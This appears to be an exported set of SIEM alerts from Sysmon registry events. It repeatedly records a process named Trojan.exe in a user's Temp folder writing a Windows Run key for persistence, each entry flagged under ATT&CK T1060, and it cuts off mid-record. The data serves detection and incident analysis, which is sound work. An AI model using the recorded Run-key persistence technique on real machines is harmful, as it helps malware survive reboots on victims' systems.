HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:43.808625600Z"",""eventRecordID"":""1331"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:43.785\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:43.785"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:04.334",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:42.742 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:42.809053100Z"",""eventRecordID"":""1330"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:42.742\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:42.742"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:03.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:41.691 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:41.736541700Z"",""eventRecordID"":""1323"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:41.691\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:41.691"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:01.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:40.625 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:40.626463100Z"",""eventRecordID"":""1321"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:40.625\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:40.625"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:01.385",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:39.621 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:39.721057500Z"",""eventRecordID"":""1318"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:39.621\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:39.621"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:00.153",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:38.558 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:38.565602300Z"",""eventRecordID"":""1317"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:38.558\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:38.558"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:59.307",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:37.543 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:37.558363600Z"",""eventRecordID"":""1316"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:37.543\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:37.543"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:51.255",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:36.529 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:36.533973900Z"",""eventRecordID"":""1314"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:36.529\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:36.529"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:51.066",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:35.523 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:35.557402500Z"",""eventRecordID"":""1313"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:35.523\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:35.523"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:48.695",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:34.245 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:34.253203700Z"",""eventRecordID"":""1312"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:34.245\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:34.245"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:48.376",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:33.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:33.253704600Z"",""eventRecordID"":""1311"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:33.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:33.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:48.059",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:32.155 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 